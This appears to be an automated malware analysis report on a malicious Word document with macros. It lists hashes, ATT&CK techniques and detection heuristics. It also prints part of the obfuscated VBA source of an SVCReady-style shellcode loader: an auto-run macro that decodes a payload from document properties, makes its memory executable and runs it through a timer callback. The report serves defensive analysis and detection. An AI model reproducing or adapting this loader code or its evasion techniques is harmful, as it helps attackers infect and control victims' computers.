Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 997e7608f4a7ad0a…

MALICIOUS

Office (OOXML) / .DOC

2.21 MB Created: 2022-08-11 14:50:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2022-08-11
MD5: 399e57a077e7bd2bc87e2579cd235146 SHA-1: 607a6d5bc6797ba94240802dc33f44d946f9dd1f SHA-256: 997e7608f4a7ad0aa779e8bb7c346e8a61dafacce65116c323125b389c80398c
362 Risk Score

Malware Insights

MITRE ATT&CK
T1566.002 Spearphishing Attachment T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with a renamed VBA project part, indicating an attempt to evade detection. The presence of a Document_Open macro, GetObject, and CallByName calls, along with a VBA property-stored shellcode loader that reads reversed configuration from document properties, strongly suggests a malicious downloader. The document body explicitly instructs the user to 'Enable editing' and 'Enable content', a common lure for macro-based malware.

Heuristics 10

  • ClamAV: Doc.Downloader.8a5a5aca5aca5a7a-OOXML-9981537-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.8a5a5aca5aca5a7a-OOXML-9981537-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/DhYFdPRKMn.bin)
  • VBA property-stored shellcode loader critical OLE_VBA_PROPERTY_SHELLCODE_LOADER
    VBA auto-exec macro takes the address (VarPtr) of a byte buffer decoded from a document property, marks memory executable (VirtualProtect/VirtualAlloc), and transfers control through a callback API (e.g. SetTimer/EnumWindows). The payload is hidden in the document properties rather than the macro source — the SVCReady loader pattern, a native shellcode runner rather than a parser CVE.
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA reads reversed config from document properties high OLE_VBA_REVERSED_DOCPROP_CONFIG
    VBA applies StrReverse to values read from the document's custom/built-in properties. Storing reversed configuration (URLs, CLSIDs, env-var names, payload names) in document properties keeps indicators out of the macro source — an obfuscation technique used by the SVCReady loader.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
26d9eb318c7ac7dab42d327b6f5b7b1c07e074adffb611fd3102fb2b3588eddb		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 20161 bytes
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function ––——————––——–———––—––——–———— Lib "kernel32" Alias "VirtualProtect" (ByVal —–——––––————–—–— As LongPtr, ByVal —–—–––——––——–———————––——–—–––—– As LongPtr, ByVal ——––––—–——––––—— As LongPtr, ––—–—–—–—–————––——— As LongPtr) As LongPtr
Private Declare PtrSafe Function —––––——–– Lib "user32" Alias "KillTimer" (ByVal ——–—– As LongPtr, ByVal –——–———–——–– As LongPtr) As LongPtr
Private Declare PtrSafe Function —–—–————— Lib "user32" Alias "SetTimer" (ByVal ––—–—–——––————–——––—–— As LongPtr, ByVal –—––– As LongPtr, ByVal ——––———––—–—–— As LongPtr, ByVal –——––—––——––—————–—–—–—– As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Function ——–—–—–––––—–––—–––––—–——–——(—–—––——–——————–––, Optional –—–—–————–——— = False)
    If –—–—–————–——— Then
        Set ––—–—––—–———–—––– = GetObject(—–—––——–——————–––)
    Else
        Set ––—–—––—–———–—––– = ————––—––———–—––(——–––––––—–—————————(), —–—––——–——————–––)
    End If
    Set ——–—–—–––––—–––—–––––—–——–—— = ––—–—––—–———–—–––
    End Function
Function ———–——–—–––—––——(—–––——––——––—–, ––—––——–—––—––—————––—–————–)
    ———–——–—–––—––—— = Mid(—–––——––——––—–, ––—––——–—––—––—————––—–————– + 1, 1)
End Function
Function —––—–––––—–––––———–—–—–—––—(—–———–—–———––, Optional ––—––———––——–———–—––— = False)
    If ––—––———––——–———–—––— Then
        –—–——–——–––—–––—–————––— = Len(—–———–—–———––)
    Else
        –—–——–——–––—–––—–————––— = ————––—––———–—––(—–————–—————––(), —–———–—–———––)
    End If
    —––—–––––—–––––———–—–—–—––— = –—–——–——–––—–––—–————––—
    End Function
Sub ————––––––———–––——(w)
    Dim —––—–––—–—– As Long
    Dim ––––– As Long
    ––––– = —–—––—–() + (–—–––—–——––—)
    Do
        —––—–––—–—– = —–—––—–()
        DoEvents
    Loop Until —––—–––—–—– > –––––
End Sub
Function –—–—–—()
    –—–—–— = 11
    End Function
Function —–––—–———–—–——()
    —–––—–———–—–—— = 2
    End Function
Private Sub Document_Open()
    Dim ––—–——–————() As Byte
    If –——––——() Then
        ––—–——–———— = –––—–(–—–—(Tmesca4R6S("zIrZFvu9")).Value)
    Else
        ––—–——–———— = –––—–(–—–—(Tmesca4R6S("sggONjSJ7")).Value)
    End If
    Dim —––———––—––—––—–—–—– As LongPtr
    Dim ——––—–—–—–——–—–—————–—– As LongPtr
    Dim –— As LongPtr
    Dim —–––––––––––––––––––––——––——––— As LongPtr
    ——––—–—–—–——–—–—————–—– = ——–––—–——–––––—––––————––—(––—–——–————) + 1
    –— = VarPtr(––—–——–————(0))
    ––——————––——–———––—––——–———— –—, ——––—–—–—–——–—–—————–—–, 64, VarPtr(—––———––—––—––—–—–—–)
            ––—–––——––———–––—–—–—–——–—()(Tmesca4R6S("pokkwYZ_Z")) = Tmesca4R6S("skAI7pCo1PO")
        —–––––––––––––––––––––——––——––— = —–—–—————(0, –—, 1, –—)
    ————––––––———–––—— 1
    —––––——–– 0, —–––––––––––––––––––––——––——––—
    ––—–––——––———–––—–—–—–——–—().Remove (Tmesca4R6S("CYMWW3d2l"))
    ––—–––——––———–––—–—–—–——–—().Remove (Tmesca4R6S("zKrvnK5tEv"))
    ReDim ––—–——–————(1)
End Sub
Function ––—–———–()
    ––—–———– = 8
    End Function
Function –——––——()
    #If Win64 Then
        –——––—— = True
    #Else
        –——––—— = False
    #End If
End Function
Function —–————–—————––()
    —–————–—————–– = 6
    End Function
Function ——–––––––—–—————————()
    ——–––––––—–————————— = 4
    End Function
Function —––———–——–—––—––—(——–———––, —–——–—–——––—–——–————–, Optional ––—–———––—––—–——–––——–—–——–– = False)
    If ––—–———––—––—–——–––——–—–——–– Then
        –– = Mid(——–———––, —–——–—–——––—–——–————– + 1, 1)
    Else
        –– = ————––—––———–—––(–—–––——–———–———––—–—–––—––(), ——–———––, —–——–—–——––—–——–————–)
    End If
    —––———–——–—––—––— = ––
    End 
... (truncated)
vbaProject_00.bin
bc858bacd44938933d8b5d0f48372c0e4cfcb293c8a0d0936bf2d1458510f8f0		 vba-project OOXML VBA project: word/DhYFdPRKMn.bin 14848 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.